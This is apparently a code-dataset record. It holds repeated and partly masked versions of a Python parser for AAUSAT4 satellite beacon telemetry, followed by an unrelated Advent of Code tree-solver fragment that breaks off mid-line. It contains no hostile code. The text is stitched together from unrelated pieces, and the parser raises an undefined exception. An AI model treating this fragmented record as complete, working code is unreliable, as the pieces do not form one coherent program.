battery_current, self.solar_power, self.temp, self.pa_temp)) return eps_str class COM(object): def __init__(self, com_data): (self.boot_count, self.packets_received, self.packets_send, self. latest_rssi, self.latest_bit_correction, self. latest_byte_correction) = struct.unpack('>HHHhBB', com_data) self.boot_count &= 8191 def __str__(self): com_str = ( """COM: Boot count: {0} Packets received: {1} Packets send: {2} Latest rssi: {3} Latest bit corrections: {4} Latest byte corrections:{5}""" .format(self.boot_count, self.packets_received, self. packets_send, self.latest_rssi, self.latest_bit_correction, self.latest_byte_correction)) return com_str class ADCS1(object): def __init__(self, adcs1_data): data = struct.unpack('>hhhB', adcs1_data) self.bdot = tuple(data[0:3]) self.state = data[3] def __str__(self): adcs1_str = """ADCS1: State: {} Bdot: {}""".format(self .state, self.bdot) return adcs1_str class ADCS2(object): def __init__(self, adcs2_data): self.gyro = tuple(struct.unpack('>hhh', adcs2_data)) def __str__(self): adcs2_str = """ADCS2: Gyro: {}""".format(self.gyro) return adcs2_str class AIS(object): def __init__(self, ais_data): self.boot_count, _, _, self.unique_mssi, _ = struct.unpack('>HhhH12s', ais_data) def __str__(self): ais_str = ("""AIS: Boot count: {} Unique MSSI: {}""" .format(self.boot_count, self.unique_mssi)) return ais_str class Beacon(object): def __init__(self, raw_data): if len(raw_data) != BEACON_LENGTH: raise ValueError('Malformed beacon (incorrect length)') self.subsystems = {} (valid, eps_raw, com_raw, adcs1_raw, adcs2_raw, ais1_raw, ais2_raw) = ( struct.unpack(('B' + '{}s' * 6).format(EPS_LENGTH, COM_LENGTH, ADCS1_LENGTH, ADCS2_LENGTH, AIS_LENGTH, AIS_LENGTH), raw_data)) eps_valid = valid & 1 << 0 com_valid = valid & 1 << 1 adcs1_valid = valid & 1 << 2 adcs2_valid = valid & 1 << 3 ais1_valid = valid & 1 << 4 ais2_valid = valid & 1 << 5 if eps_valid: self.subsystems['EPS'] = EPS(eps_raw) if com_valid: self.subsystems['COM'] = COM(com_raw) 
if adcs1_valid: self.subsystems['ADCS1'] = ADCS1(adcs1_raw) if adcs2_valid: self.subsystems['ADCS2'] = ADCS2(adcs2_raw) if ais1_valid: self.subsystems['AIS1'] = AIS(ais1_raw) if ais2_valid: self.subsystems['AIS2'] = AIS(ais2_raw) def __str__(self): beacon_str = '' for k, v in self.subsystems.items(): beacon_str += str(v) + '\n' return beacon_str <|reserved_special_token_1|> from datetime import datetime import struct BEACON_LENGTH = 84 EPS_LENGTH = 20 COM_LENGTH = 10 ADCS1_LENGTH = 7 ADCS2_LENGTH = 6 AIS_LENGTH = 20 class EPS(object): def __init__(self, eps_data): if len(eps_data) != EPS_LENGTH: raise InputException(len(eps_data), EPS_LENGTH) (self.boot_count, self.uptime, self.rt_clock, self.ping_status, self.subsystem_status, self.battery_voltage, self.cell_diff, self.battery_current, self.solar_power, self.temp, self.pa_temp, self.main_voltage) = struct.unpack('>HIIBHBbbBbbb', eps_data) self.battery_voltage *= 40 self.cell_diff *= 4 self.battery_current *= 10 self.solar_power *= 20 def __str__(self): eps_str = ( """EPS: Boot count: {0} Up time: {1} seconds Real time clock: {2} Battery voltage: {3} mV Cell difference: {4:.1f} mV Battery current: {5} mA Solar power: {6} Temperature: {7} C PA temperature: {8} C""" .format(self.boot_count, self.uptime, datetime.fromtimestamp( self.rt_clock), self.battery_voltage, self.cell_diff, self. battery_current, self.solar_power, self.temp, self.pa_temp)) return eps_str class COM(object): def __init__(self, com_data): (self.boot_count, self.packets_received, self.packets_send, self. latest_rssi, self.latest_bit_correction, self. latest_byte_correction) = struct.unpack('>HHHhBB', com_data) self.boot_count &= 8191 def __str__(self): com_str = ( """COM: Boot count: {0} Packets received: {1} Packets send: {2} Latest rssi: {3} Latest bit corrections: {4} Latest byte corrections:{5}""" .format(self.boot_count, self.packets_received, self. 
packets_send, self.latest_rssi, self.latest_bit_correction, self.latest_byte_correction)) return com_str class ADCS1(object): def __init__(self, adcs1_data): data = struct.unpack('>hhhB', adcs1_data) self.bdot = tuple(data[0:3]) self.state = data[3] def __str__(self): adcs1_str = """ADCS1: State: {} Bdot: {}""".format(self .state, self.bdot) return adcs1_str class ADCS2(object): def __init__(self, adcs2_data): self.gyro = tuple(struct.unpack('>hhh', adcs2_data)) def __str__(self): adcs2_str = """ADCS2: Gyro: {}""".format(self.gyro) return adcs2_str class AIS(object): def __init__(self, ais_data): self.boot_count, _, _, self.unique_mssi, _ = struct.unpack('>HhhH12s', ais_data) def __str__(self): ais_str = ("""AIS: Boot count: {} Unique MSSI: {}""" .format(self.boot_count, self.unique_mssi)) return ais_str class Beacon(object): def __init__(self, raw_data): if len(raw_data) != BEACON_LENGTH: raise ValueError('Malformed beacon (incorrect length)') self.subsystems = {} (valid, eps_raw, com_raw, adcs1_raw, adcs2_raw, ais1_raw, ais2_raw) = ( struct.unpack(('B' + '{}s' * 6).format(EPS_LENGTH, COM_LENGTH, ADCS1_LENGTH, ADCS2_LENGTH, AIS_LENGTH, AIS_LENGTH), raw_data)) eps_valid = valid & 1 << 0 com_valid = valid & 1 << 1 adcs1_valid = valid & 1 << 2 adcs2_valid = valid & 1 << 3 ais1_valid = valid & 1 << 4 ais2_valid = valid & 1 << 5 if eps_valid: self.subsystems['EPS'] = EPS(eps_raw) if com_valid: self.subsystems['COM'] = COM(com_raw) if adcs1_valid: self.subsystems['ADCS1'] = ADCS1(adcs1_raw) if adcs2_valid: self.subsystems['ADCS2'] = ADCS2(adcs2_raw) if ais1_valid: self.subsystems['AIS1'] = AIS(ais1_raw) if ais2_valid: self.subsystems['AIS2'] = AIS(ais2_raw) def __str__(self): beacon_str = '' for k, v in self.subsystems.items(): beacon_str += str(v) + '\n' return beacon_str <|reserved_special_token_1|> from datetime import datetime import struct BEACON_LENGTH = 84 EPS_LENGTH = 20 COM_LENGTH = 10 # reverse engineered ADCS1_LENGTH = 7 ADCS2_LENGTH = 6 AIS_LENGTH = 20 class 
EPS(object): def __init__(self, eps_data): if len(eps_data) != EPS_LENGTH: raise InputException(len(eps_data), EPS_LENGTH) self.boot_count, self.uptime, self.rt_clock, self.ping_status, self.subsystem_status,\ self.battery_voltage, self.cell_diff, self.battery_current, self.solar_power,\ self.temp, self.pa_temp, self.main_voltage = struct.unpack(">HIIBHBbbBbbb", eps_data) self.battery_voltage *= 40 self.cell_diff *= 4 self.battery_current *= 10 self.solar_power *= 20 def __str__(self): eps_str = ("""EPS: Boot count:\t\t{0} Up time:\t\t{1} seconds Real time clock:\t{2} Battery voltage:\t{3} mV Cell difference:\t{4:.1f} mV Battery current:\t{5} mA Solar power:\t\t{6} Temperature:\t\t{7} C PA temperature:\t\t{8} C""".format( self.boot_count, self.uptime, datetime.fromtimestamp(self.rt_clock), self.battery_voltage, self.cell_diff, self.battery_current, self.solar_power, self.temp, self.pa_temp)) return eps_str class COM(object): def __init__(self, com_data): self.boot_count, self.packets_received, self.packets_send, self.latest_rssi,\ self.latest_bit_correction, self.latest_byte_correction = \ struct.unpack(">HHHhBB", com_data) self.boot_count &= 0x1fff def __str__(self): com_str = ("""COM: Boot count:\t\t{0} Packets received:\t{1} Packets send:\t\t{2} Latest rssi:\t\t{3} Latest bit corrections:\t{4} Latest byte corrections:{5}""".format( self.boot_count, self.packets_received, self.packets_send, self.latest_rssi, self.latest_bit_correction, self.latest_byte_correction)) return com_str # Reverse engineered classes class ADCS1(object): def __init__(self, adcs1_data): data = struct.unpack(">hhhB", adcs1_data) self.bdot = tuple(data[0:3]) self.state = data[3] def __str__(self): adcs1_str = ("""ADCS1: State:\t{} Bdot:\t{}""".format(self.state, self.bdot)) return adcs1_str class ADCS2(object): def __init__(self, adcs2_data): self.gyro = tuple(struct.unpack(">hhh", adcs2_data)) def __str__(self): adcs2_str = ("""ADCS2: Gyro:\t{}""".format(self.gyro)) return adcs2_str class 
AIS(object): def __init__(self, ais_data): # there are some fields which apparently are 0 all the time # this fields can't be identified by reverse engineering self.boot_count, _, _, self.unique_mssi, _ = struct.unpack(">HhhH12s", ais_data) def __str__(self): ais_str = ("""AIS: Boot count:\t{} Unique MSSI:\t{}""".format(self.boot_count, self.unique_mssi)) return ais_str ## Beacon # The beacon class takes a string of bytes as input, and parses it to generate # a representation of the beacon format used by AASUAT4 # The beacon format is as follows: # [ 1 byte | 19 bytes | 12 bytes | 7 bytes | 6 bytes | 20 bytes | 20 bytes ] # [ Valid | EPS | COM | ADCS1 | ADCS2 | AIS1 | AIS2 ] # This is not correct EPS is 20 bytes and COM is 10 bytes # The remaining fields seem to have the correct length # # For each subsystem, which are valid, are the corresponding data bytes passed to another # class which parses the information. # # The __str__ method returns a human readable string with key information from the beacon class Beacon(object): def __init__(self, raw_data): if len(raw_data) != BEACON_LENGTH: raise ValueError("Malformed beacon (incorrect length)") self.subsystems = {} valid, eps_raw, com_raw, adcs1_raw, adcs2_raw, ais1_raw, ais2_raw = \ struct.unpack(("B"+"{}s"*6).format(EPS_LENGTH, COM_LENGTH, ADCS1_LENGTH, ADCS2_LENGTH, AIS_LENGTH, AIS_LENGTH), raw_data) # reverse engineered valid bits # EPS and COM are known from university team code # valid byte is usually 0x27 # in DK3WN's blog we see that EPS, COM, AIS2 and ADCS1 are valid eps_valid = valid & (1 << 0) com_valid = valid & (1 << 1) adcs1_valid = valid & (1 << 2) adcs2_valid = valid & (1 << 3) ais1_valid = valid & (1 << 4) ais2_valid = valid & (1 << 5) if eps_valid: self.subsystems['EPS'] = EPS(eps_raw) if com_valid: self.subsystems['COM'] = COM(com_raw) if adcs1_valid: self.subsystems['ADCS1'] = ADCS1(adcs1_raw) if adcs2_valid: self.subsystems['ADCS2'] = ADCS2(adcs2_raw) if ais1_valid: self.subsystems['AIS1'] = 
AIS(ais1_raw) if ais2_valid: self.subsystems['AIS2'] = AIS(ais2_raw) def __str__(self): beacon_str = "" for k,v in self.subsystems.items(): beacon_str += str(v) + "\n" return beacon_str
flexible
{ "blob_id": "505689803c8f4490619ab1a7579fde1e2c18c538", "index": 5532, "step-1": "<mask token>\n\n\nclass ADCS2(object):\n\n def __init__(self, adcs2_data):\n self.gyro = tuple(struct.unpack('>hhh', adcs2_data))\n <mask token>\n\n\nclass AIS(object):\n\n def __init__(self, ais_data):\n self.boot_count, _, _, self.unique_mssi, _ = struct.unpack('>HhhH12s',\n ais_data)\n\n def __str__(self):\n ais_str = (\"\"\"AIS:\n Boot count:\t{}\n Unique MSSI:\t{}\"\"\"\n .format(self.boot_count, self.unique_mssi))\n return ais_str\n\n\nclass Beacon(object):\n\n def __init__(self, raw_data):\n if len(raw_data) != BEACON_LENGTH:\n raise ValueError('Malformed beacon (incorrect length)')\n self.subsystems = {}\n (valid, eps_raw, com_raw, adcs1_raw, adcs2_raw, ais1_raw, ais2_raw) = (\n struct.unpack(('B' + '{}s' * 6).format(EPS_LENGTH, COM_LENGTH,\n ADCS1_LENGTH, ADCS2_LENGTH, AIS_LENGTH, AIS_LENGTH), raw_data))\n eps_valid = valid & 1 << 0\n com_valid = valid & 1 << 1\n adcs1_valid = valid & 1 << 2\n adcs2_valid = valid & 1 << 3\n ais1_valid = valid & 1 << 4\n ais2_valid = valid & 1 << 5\n if eps_valid:\n self.subsystems['EPS'] = EPS(eps_raw)\n if com_valid:\n self.subsystems['COM'] = COM(com_raw)\n if adcs1_valid:\n self.subsystems['ADCS1'] = ADCS1(adcs1_raw)\n if adcs2_valid:\n self.subsystems['ADCS2'] = ADCS2(adcs2_raw)\n if ais1_valid:\n self.subsystems['AIS1'] = AIS(ais1_raw)\n if ais2_valid:\n self.subsystems['AIS2'] = AIS(ais2_raw)\n\n def __str__(self):\n beacon_str = ''\n for k, v in self.subsystems.items():\n beacon_str += str(v) + '\\n'\n return beacon_str\n", "step-2": "<mask token>\n\n\nclass ADCS1(object):\n <mask token>\n <mask token>\n\n\nclass ADCS2(object):\n\n def __init__(self, adcs2_data):\n self.gyro = tuple(struct.unpack('>hhh', adcs2_data))\n\n def __str__(self):\n adcs2_str = \"\"\"ADCS2:\n Gyro:\t{}\"\"\".format(self.gyro)\n return adcs2_str\n\n\nclass AIS(object):\n\n def __init__(self, ais_data):\n self.boot_count, _, _, self.unique_mssi, _ = 
struct.unpack('>HhhH12s',\n ais_data)\n\n def __str__(self):\n ais_str = (\"\"\"AIS:\n Boot count:\t{}\n Unique MSSI:\t{}\"\"\"\n .format(self.boot_count, self.unique_mssi))\n return ais_str\n\n\nclass Beacon(object):\n\n def __init__(self, raw_data):\n if len(raw_data) != BEACON_LENGTH:\n raise ValueError('Malformed beacon (incorrect length)')\n self.subsystems = {}\n (valid, eps_raw, com_raw, adcs1_raw, adcs2_raw, ais1_raw, ais2_raw) = (\n struct.unpack(('B' + '{}s' * 6).format(EPS_LENGTH, COM_LENGTH,\n ADCS1_LENGTH, ADCS2_LENGTH, AIS_LENGTH, AIS_LENGTH), raw_data))\n eps_valid = valid & 1 << 0\n com_valid = valid & 1 << 1\n adcs1_valid = valid & 1 << 2\n adcs2_valid = valid & 1 << 3\n ais1_valid = valid & 1 << 4\n ais2_valid = valid & 1 << 5\n if eps_valid:\n self.subsystems['EPS'] = EPS(eps_raw)\n if com_valid:\n self.subsystems['COM'] = COM(com_raw)\n if adcs1_valid:\n self.subsystems['ADCS1'] = ADCS1(adcs1_raw)\n if adcs2_valid:\n self.subsystems['ADCS2'] = ADCS2(adcs2_raw)\n if ais1_valid:\n self.subsystems['AIS1'] = AIS(ais1_raw)\n if ais2_valid:\n self.subsystems['AIS2'] = AIS(ais2_raw)\n\n def __str__(self):\n beacon_str = ''\n for k, v in self.subsystems.items():\n beacon_str += str(v) + '\\n'\n return beacon_str\n", "step-3": "<mask token>\nBEACON_LENGTH = 84\nEPS_LENGTH = 20\nCOM_LENGTH = 10\nADCS1_LENGTH = 7\nADCS2_LENGTH = 6\nAIS_LENGTH = 20\n\n\nclass EPS(object):\n\n def __init__(self, eps_data):\n if len(eps_data) != EPS_LENGTH:\n raise InputException(len(eps_data), EPS_LENGTH)\n (self.boot_count, self.uptime, self.rt_clock, self.ping_status,\n self.subsystem_status, self.battery_voltage, self.cell_diff,\n self.battery_current, self.solar_power, self.temp, self.pa_temp,\n self.main_voltage) = struct.unpack('>HIIBHBbbBbbb', eps_data)\n self.battery_voltage *= 40\n self.cell_diff *= 4\n self.battery_current *= 10\n self.solar_power *= 20\n\n def __str__(self):\n eps_str = (\n \"\"\"EPS:\n Boot count:\t\t{0}\n Up time:\t\t{1} seconds\n Real time 
clock:\t{2}\n Battery voltage:\t{3} mV\n Cell difference:\t{4:.1f} mV\n Battery current:\t{5} mA\n Solar power:\t\t{6}\n Temperature:\t\t{7} C\n PA temperature:\t\t{8} C\"\"\"\n .format(self.boot_count, self.uptime, datetime.fromtimestamp(\n self.rt_clock), self.battery_voltage, self.cell_diff, self.\n battery_current, self.solar_power, self.temp, self.pa_temp))\n return eps_str\n\n\nclass COM(object):\n\n def __init__(self, com_data):\n (self.boot_count, self.packets_received, self.packets_send, self.\n latest_rssi, self.latest_bit_correction, self.\n latest_byte_correction) = struct.unpack('>HHHhBB', com_data)\n self.boot_count &= 8191\n\n def __str__(self):\n com_str = (\n \"\"\"COM:\n Boot count:\t\t{0}\n Packets received:\t{1}\n Packets send:\t\t{2}\n Latest rssi:\t\t{3}\n Latest bit corrections:\t{4}\n Latest byte corrections:{5}\"\"\"\n .format(self.boot_count, self.packets_received, self.\n packets_send, self.latest_rssi, self.latest_bit_correction,\n self.latest_byte_correction))\n return com_str\n\n\nclass ADCS1(object):\n\n def __init__(self, adcs1_data):\n data = struct.unpack('>hhhB', adcs1_data)\n self.bdot = tuple(data[0:3])\n self.state = data[3]\n\n def __str__(self):\n adcs1_str = \"\"\"ADCS1:\n State:\t{}\n Bdot:\t{}\"\"\".format(self\n .state, self.bdot)\n return adcs1_str\n\n\nclass ADCS2(object):\n\n def __init__(self, adcs2_data):\n self.gyro = tuple(struct.unpack('>hhh', adcs2_data))\n\n def __str__(self):\n adcs2_str = \"\"\"ADCS2:\n Gyro:\t{}\"\"\".format(self.gyro)\n return adcs2_str\n\n\nclass AIS(object):\n\n def __init__(self, ais_data):\n self.boot_count, _, _, self.unique_mssi, _ = struct.unpack('>HhhH12s',\n ais_data)\n\n def __str__(self):\n ais_str = (\"\"\"AIS:\n Boot count:\t{}\n Unique MSSI:\t{}\"\"\"\n .format(self.boot_count, self.unique_mssi))\n return ais_str\n\n\nclass Beacon(object):\n\n def __init__(self, raw_data):\n if len(raw_data) != BEACON_LENGTH:\n raise ValueError('Malformed beacon (incorrect length)')\n 
self.subsystems = {}\n (valid, eps_raw, com_raw, adcs1_raw, adcs2_raw, ais1_raw, ais2_raw) = (\n struct.unpack(('B' + '{}s' * 6).format(EPS_LENGTH, COM_LENGTH,\n ADCS1_LENGTH, ADCS2_LENGTH, AIS_LENGTH, AIS_LENGTH), raw_data))\n eps_valid = valid & 1 << 0\n com_valid = valid & 1 << 1\n adcs1_valid = valid & 1 << 2\n adcs2_valid = valid & 1 << 3\n ais1_valid = valid & 1 << 4\n ais2_valid = valid & 1 << 5\n if eps_valid:\n self.subsystems['EPS'] = EPS(eps_raw)\n if com_valid:\n self.subsystems['COM'] = COM(com_raw)\n if adcs1_valid:\n self.subsystems['ADCS1'] = ADCS1(adcs1_raw)\n if adcs2_valid:\n self.subsystems['ADCS2'] = ADCS2(adcs2_raw)\n if ais1_valid:\n self.subsystems['AIS1'] = AIS(ais1_raw)\n if ais2_valid:\n self.subsystems['AIS2'] = AIS(ais2_raw)\n\n def __str__(self):\n beacon_str = ''\n for k, v in self.subsystems.items():\n beacon_str += str(v) + '\\n'\n return beacon_str\n", "step-4": "from datetime import datetime\nimport struct\nBEACON_LENGTH = 84\nEPS_LENGTH = 20\nCOM_LENGTH = 10\nADCS1_LENGTH = 7\nADCS2_LENGTH = 6\nAIS_LENGTH = 20\n\n\nclass EPS(object):\n\n def __init__(self, eps_data):\n if len(eps_data) != EPS_LENGTH:\n raise InputException(len(eps_data), EPS_LENGTH)\n (self.boot_count, self.uptime, self.rt_clock, self.ping_status,\n self.subsystem_status, self.battery_voltage, self.cell_diff,\n self.battery_current, self.solar_power, self.temp, self.pa_temp,\n self.main_voltage) = struct.unpack('>HIIBHBbbBbbb', eps_data)\n self.battery_voltage *= 40\n self.cell_diff *= 4\n self.battery_current *= 10\n self.solar_power *= 20\n\n def __str__(self):\n eps_str = (\n \"\"\"EPS:\n Boot count:\t\t{0}\n Up time:\t\t{1} seconds\n Real time clock:\t{2}\n Battery voltage:\t{3} mV\n Cell difference:\t{4:.1f} mV\n Battery current:\t{5} mA\n Solar power:\t\t{6}\n Temperature:\t\t{7} C\n PA temperature:\t\t{8} C\"\"\"\n .format(self.boot_count, self.uptime, datetime.fromtimestamp(\n self.rt_clock), self.battery_voltage, self.cell_diff, self.\n battery_current, 
self.solar_power, self.temp, self.pa_temp))\n return eps_str\n\n\nclass COM(object):\n\n def __init__(self, com_data):\n (self.boot_count, self.packets_received, self.packets_send, self.\n latest_rssi, self.latest_bit_correction, self.\n latest_byte_correction) = struct.unpack('>HHHhBB', com_data)\n self.boot_count &= 8191\n\n def __str__(self):\n com_str = (\n \"\"\"COM:\n Boot count:\t\t{0}\n Packets received:\t{1}\n Packets send:\t\t{2}\n Latest rssi:\t\t{3}\n Latest bit corrections:\t{4}\n Latest byte corrections:{5}\"\"\"\n .format(self.boot_count, self.packets_received, self.\n packets_send, self.latest_rssi, self.latest_bit_correction,\n self.latest_byte_correction))\n return com_str\n\n\nclass ADCS1(object):\n\n def __init__(self, adcs1_data):\n data = struct.unpack('>hhhB', adcs1_data)\n self.bdot = tuple(data[0:3])\n self.state = data[3]\n\n def __str__(self):\n adcs1_str = \"\"\"ADCS1:\n State:\t{}\n Bdot:\t{}\"\"\".format(self\n .state, self.bdot)\n return adcs1_str\n\n\nclass ADCS2(object):\n\n def __init__(self, adcs2_data):\n self.gyro = tuple(struct.unpack('>hhh', adcs2_data))\n\n def __str__(self):\n adcs2_str = \"\"\"ADCS2:\n Gyro:\t{}\"\"\".format(self.gyro)\n return adcs2_str\n\n\nclass AIS(object):\n\n def __init__(self, ais_data):\n self.boot_count, _, _, self.unique_mssi, _ = struct.unpack('>HhhH12s',\n ais_data)\n\n def __str__(self):\n ais_str = (\"\"\"AIS:\n Boot count:\t{}\n Unique MSSI:\t{}\"\"\"\n .format(self.boot_count, self.unique_mssi))\n return ais_str\n\n\nclass Beacon(object):\n\n def __init__(self, raw_data):\n if len(raw_data) != BEACON_LENGTH:\n raise ValueError('Malformed beacon (incorrect length)')\n self.subsystems = {}\n (valid, eps_raw, com_raw, adcs1_raw, adcs2_raw, ais1_raw, ais2_raw) = (\n struct.unpack(('B' + '{}s' * 6).format(EPS_LENGTH, COM_LENGTH,\n ADCS1_LENGTH, ADCS2_LENGTH, AIS_LENGTH, AIS_LENGTH), raw_data))\n eps_valid = valid & 1 << 0\n com_valid = valid & 1 << 1\n adcs1_valid = valid & 1 << 2\n adcs2_valid = 
valid & 1 << 3\n ais1_valid = valid & 1 << 4\n ais2_valid = valid & 1 << 5\n if eps_valid:\n self.subsystems['EPS'] = EPS(eps_raw)\n if com_valid:\n self.subsystems['COM'] = COM(com_raw)\n if adcs1_valid:\n self.subsystems['ADCS1'] = ADCS1(adcs1_raw)\n if adcs2_valid:\n self.subsystems['ADCS2'] = ADCS2(adcs2_raw)\n if ais1_valid:\n self.subsystems['AIS1'] = AIS(ais1_raw)\n if ais2_valid:\n self.subsystems['AIS2'] = AIS(ais2_raw)\n\n def __str__(self):\n beacon_str = ''\n for k, v in self.subsystems.items():\n beacon_str += str(v) + '\\n'\n return beacon_str\n", "step-5": "from datetime import datetime\nimport struct\n\nBEACON_LENGTH = 84\nEPS_LENGTH = 20\nCOM_LENGTH = 10\n\n# reverse engineered\nADCS1_LENGTH = 7\nADCS2_LENGTH = 6\nAIS_LENGTH = 20\n\nclass EPS(object):\n def __init__(self, eps_data):\n if len(eps_data) != EPS_LENGTH:\n raise InputException(len(eps_data), EPS_LENGTH)\n\n self.boot_count, self.uptime, self.rt_clock, self.ping_status, self.subsystem_status,\\\n self.battery_voltage, self.cell_diff, self.battery_current, self.solar_power,\\\n self.temp, self.pa_temp, self.main_voltage = struct.unpack(\">HIIBHBbbBbbb\", eps_data)\n\n self.battery_voltage *= 40\n self.cell_diff *= 4\n self.battery_current *= 10\n self.solar_power *= 20\n\n def __str__(self):\n eps_str = (\"\"\"EPS:\n Boot count:\\t\\t{0}\n Up time:\\t\\t{1} seconds\n Real time clock:\\t{2}\n Battery voltage:\\t{3} mV\n Cell difference:\\t{4:.1f} mV\n Battery current:\\t{5} mA\n Solar power:\\t\\t{6}\n Temperature:\\t\\t{7} C\n PA temperature:\\t\\t{8} C\"\"\".format(\n self.boot_count, self.uptime, datetime.fromtimestamp(self.rt_clock),\n self.battery_voltage, self.cell_diff, self.battery_current, self.solar_power,\n self.temp, self.pa_temp))\n\n return eps_str\n\n\nclass COM(object):\n def __init__(self, com_data):\n self.boot_count, self.packets_received, self.packets_send, self.latest_rssi,\\\n self.latest_bit_correction, self.latest_byte_correction = \\\n struct.unpack(\">HHHhBB\", 
com_data)\n\n self.boot_count &= 0x1fff\n \n def __str__(self):\n com_str = (\"\"\"COM:\n Boot count:\\t\\t{0}\n Packets received:\\t{1}\n Packets send:\\t\\t{2}\n Latest rssi:\\t\\t{3}\n Latest bit corrections:\\t{4}\n Latest byte corrections:{5}\"\"\".format(\n self.boot_count, self.packets_received, self.packets_send,\n self.latest_rssi, self.latest_bit_correction, self.latest_byte_correction))\n\n return com_str\n\n# Reverse engineered classes\nclass ADCS1(object):\n def __init__(self, adcs1_data):\n data = struct.unpack(\">hhhB\", adcs1_data)\n self.bdot = tuple(data[0:3])\n self.state = data[3]\n\n def __str__(self):\n adcs1_str = (\"\"\"ADCS1:\n State:\\t{}\n Bdot:\\t{}\"\"\".format(self.state, self.bdot))\n\n return adcs1_str\n\nclass ADCS2(object):\n def __init__(self, adcs2_data):\n self.gyro = tuple(struct.unpack(\">hhh\", adcs2_data))\n\n def __str__(self):\n adcs2_str = (\"\"\"ADCS2:\n Gyro:\\t{}\"\"\".format(self.gyro))\n\n return adcs2_str\n\nclass AIS(object):\n def __init__(self, ais_data):\n # there are some fields which apparently are 0 all the time\n # this fields can't be identified by reverse engineering\n self.boot_count, _, _, self.unique_mssi, _ = struct.unpack(\">HhhH12s\", ais_data)\n\n def __str__(self):\n ais_str = (\"\"\"AIS:\n Boot count:\\t{}\n Unique MSSI:\\t{}\"\"\".format(self.boot_count, self.unique_mssi))\n\n return ais_str\n\n## Beacon\n# The beacon class takes a string of bytes as input, and parses it to generate\n# a representation of the beacon format used by AASUAT4\n# The beacon format is as follows:\n\n\n# [ 1 byte | 19 bytes | 12 bytes | 7 bytes | 6 bytes | 20 bytes | 20 bytes ]\n# [ Valid | EPS | COM | ADCS1 | ADCS2 | AIS1 | AIS2 ]\n# This is not correct EPS is 20 bytes and COM is 10 bytes\n# The remaining fields seem to have the correct length\n\n#\n# For each subsystem, which are valid, are the corresponding data bytes passed to another\n# class which parses the information.\n#\n# The __str__ method returns a human 
readable string with key information from the beacon\nclass Beacon(object):\n \n def __init__(self, raw_data):\n if len(raw_data) != BEACON_LENGTH:\n raise ValueError(\"Malformed beacon (incorrect length)\")\n\n self.subsystems = {}\n\n valid, eps_raw, com_raw, adcs1_raw, adcs2_raw, ais1_raw, ais2_raw = \\\n struct.unpack((\"B\"+\"{}s\"*6).format(EPS_LENGTH, COM_LENGTH, ADCS1_LENGTH, ADCS2_LENGTH, AIS_LENGTH, AIS_LENGTH), raw_data)\n\n # reverse engineered valid bits\n # EPS and COM are known from university team code\n # valid byte is usually 0x27\n # in DK3WN's blog we see that EPS, COM, AIS2 and ADCS1 are valid\n eps_valid = valid & (1 << 0)\n com_valid = valid & (1 << 1)\n adcs1_valid = valid & (1 << 2)\n adcs2_valid = valid & (1 << 3)\n ais1_valid = valid & (1 << 4)\n ais2_valid = valid & (1 << 5)\n \n if eps_valid:\n self.subsystems['EPS'] = EPS(eps_raw)\n if com_valid:\n self.subsystems['COM'] = COM(com_raw)\n if adcs1_valid:\n self.subsystems['ADCS1'] = ADCS1(adcs1_raw)\n if adcs2_valid:\n self.subsystems['ADCS2'] = ADCS2(adcs2_raw)\n if ais1_valid:\n self.subsystems['AIS1'] = AIS(ais1_raw)\n if ais2_valid:\n self.subsystems['AIS2'] = AIS(ais2_raw)\n \n def __str__(self):\n beacon_str = \"\"\n for k,v in self.subsystems.items():\n beacon_str += str(v) + \"\\n\"\n return beacon_str\n\n", "step-ids": [ 8, 10, 19, 20, 21 ] }
[ 8, 10, 19, 20, 21 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class VerifyHandphoneForm(Form): <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class VerifyHandphoneForm(Form): handphone_hash = TextField('Enter verification code here', validators=[ Required()]) <|reserved_special_token_1|> from flask.ext.wtf import Form from wtforms import TextField from wtforms.validators import Required class VerifyHandphoneForm(Form): handphone_hash = TextField('Enter verification code here', validators=[ Required()])
flexible
{ "blob_id": "cb0df06ee474576b3024678fa0f63ce400d773ea", "index": 4096, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass VerifyHandphoneForm(Form):\n <mask token>\n", "step-3": "<mask token>\n\n\nclass VerifyHandphoneForm(Form):\n handphone_hash = TextField('Enter verification code here', validators=[\n Required()])\n", "step-4": "from flask.ext.wtf import Form\nfrom wtforms import TextField\nfrom wtforms.validators import Required\n\n\nclass VerifyHandphoneForm(Form):\n handphone_hash = TextField('Enter verification code here', validators=[\n Required()])\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
class Day8MemoryManeuver: <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_1|> class Day8MemoryManeuver: <|reserved_special_token_0|> <|reserved_special_token_0|> def _solve(self, structure, pos): if pos >= len(structure): return pos, 0 child_node_count = int(structure[pos]) pos += 1 meta_count = int(structure[pos]) result = 0 child_results = [] for i in range(child_node_count): pos += 1 pos, tmp = self._solve(structure, pos) if not self._use_child_references: result += tmp child_results.append(tmp) if meta_count > 0: for i in range(pos, pos + meta_count): current = int(structure[i + 1]) if self._use_child_references and child_node_count > 0: if current <= len(child_results): result += child_results[current - 1] else: result += current pos += 1 return pos, result <|reserved_special_token_1|> class Day8MemoryManeuver: <|reserved_special_token_0|> def solve(self, license_input): _, result = self._solve(license_input.split(' '), 0) return result def _solve(self, structure, pos): if pos >= len(structure): return pos, 0 child_node_count = int(structure[pos]) pos += 1 meta_count = int(structure[pos]) result = 0 child_results = [] for i in range(child_node_count): pos += 1 pos, tmp = self._solve(structure, pos) if not self._use_child_references: result += tmp child_results.append(tmp) if meta_count > 0: for i in range(pos, pos + meta_count): current = int(structure[i + 1]) if self._use_child_references and child_node_count > 0: if current <= len(child_results): result += child_results[current - 1] else: result += current pos += 1 return pos, result <|reserved_special_token_1|> class Day8MemoryManeuver: def __init__(self, use_reference_count=False): """ Args: use_reference_count (bool): True: If an entry has child nodes, the meta data are referring to the results of the child node False: Sum all meta data up """ self._use_child_references = use_reference_count def solve(self, license_input): _, result = 
